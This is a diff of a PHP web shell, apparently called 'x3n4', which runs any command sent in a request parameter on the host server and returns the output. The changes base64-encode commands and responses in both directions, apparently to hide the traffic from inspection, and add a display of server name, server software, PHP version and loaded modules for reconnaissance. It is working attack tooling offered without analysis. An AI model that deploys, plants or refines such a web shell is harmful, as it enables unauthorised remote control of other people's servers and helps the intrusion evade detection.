@@ -126,8 +126,8 @@ function output_json($output = '')
126126 }
127127 }
128128
129- $ outputexecute_command ($ _REQUEST 'cmd ' ] . ' 2>&1 ' );
130- output_json ($ output
129+ $ outputexecute_command (base64_decode ( $ _REQUEST 'cmd ' ]) . ' 2>&1 ' );
130+ output_json (base64_encode ( $ output) );
131131}
132132
133133/**
@@ -205,13 +205,21 @@ function output_json($output = '')
205205 <td><?php echo $ _SERVER 'SERVER_ADDR ' ]; ?> </td>
206206 </tr>
207207 <tr>
208- <td>Client IP:</td>
209- <td><?php echo $ _SERVER 'REMOTE_ADDR ' ]; ?> </td>
208+ <td>Server Name:</td>
209+ <td><?php echo $ _SERVER 'SERVER_NAME ' ]; ?> </td>
210+ </tr>
211+ <tr>
212+ <td>Server Sofware:</td>
213+ <td><?php echo $ _SERVER 'SERVER_SOFTWARE ' ]; ?> </td>
210214 </tr>
211215 <tr>
212216 <td>PHP Version:</td>
213217 <td><?php echo phpversion (); ?> </td>
214218 </tr>
219+ <tr>
220+ <td>Client IP:</td>
221+ <td><?php echo $ _SERVER 'REMOTE_ADDR ' ]; ?> </td>
222+ </tr>
215223 <tr>
216224 <td>Installed modules:</td>
217225 <td><?php echo implode (', ' , get_loaded_extensions ()); ?> </td>
@@ -223,6 +231,7 @@ function output_json($output = '')
223231 <tr>
224232 <td>Shell function:</td>
225233 <td><?php echo get_shell_command (); ?> </td>
234+ </tr>
226235 </table>
227236 </div>
228237
@@ -246,6 +255,9 @@ function output_json($output = '')
246255 <!-- Include all compiled plugins (below), or include individual files as needed -->
247256 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
248257 <script>
258+ // Create Base64 Object
259+ var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(e){var t="";var n,r,i,s,o,u,a;var f=0;e=Base64._utf8_encode(e);while(f<e.length){n=e.charCodeAt(f++);r=e.charCodeAt(f++);i=e.charCodeAt(f++);s=n>>2;o=(n&3)<<4|r>>4;u=(r&15)<<2|i>>6;a=i&63;if(isNaN(r)){u=a=64}else if(isNaN(i)){a=64}t=t+this._keyStr.charAt(s)+this._keyStr.charAt(o)+this._keyStr.charAt(u)+this._keyStr.charAt(a)}return t},decode:function(e){var t="";var n,r,i;var s,o,u,a;var f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=this._keyStr.indexOf(e.charAt(f++));o=this._keyStr.indexOf(e.charAt(f++));u=this._keyStr.indexOf(e.charAt(f++));a=this._keyStr.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}t=Base64._utf8_decode(t);return t},_utf8_encode:function(e){e=e.replace(/rn/g,"n");var t="";for(var n=0;n<e.length;n++){var r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r)}else if(r>127&&r<2048){t+=String.fromCharCode(r>>6|192);t+=String.fromCharCode(r&63|128)}else{t+=String.fromCharCode(r>>12|224);t+=String.fromCharCode(r>>6&63|128);t+=String.fromCharCode(r&63|128)}}return t},_utf8_decode:function(e){var t="";var n=0;var r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t}}
260+
249261 function x3n4 () {
250262 this.version = '<?php echo X3N4_VERSION ; ?> ';
251263 this.script_path = '<?php echo $ _SERVER 'REQUEST_URI ' ]; ?> ';
@@ -254,12 +266,12 @@ function x3n4 () {
254266 $('#stdout').html('');
255267 return;
256268 }
269+ command = Base64.encode(command);
257270 $.post(this.script_path, {cmd: command}, function(data) {
258- console.log(data);
259271 if (data.stdout) {
260- $('#stdout').append(data.banner + " " + command + "\n");
272+ $('#stdout').append(data.banner + " " + Base64.decode( command) + "\n");
261273 if (data.stdout !== null) {
262- $('#stdout').append(data.stdout);
274+ $('#stdout').append(Base64.decode( data.stdout) );
263275 }
264276 $('#pwd').html(data.banner);
265277 } else {
0 commit comments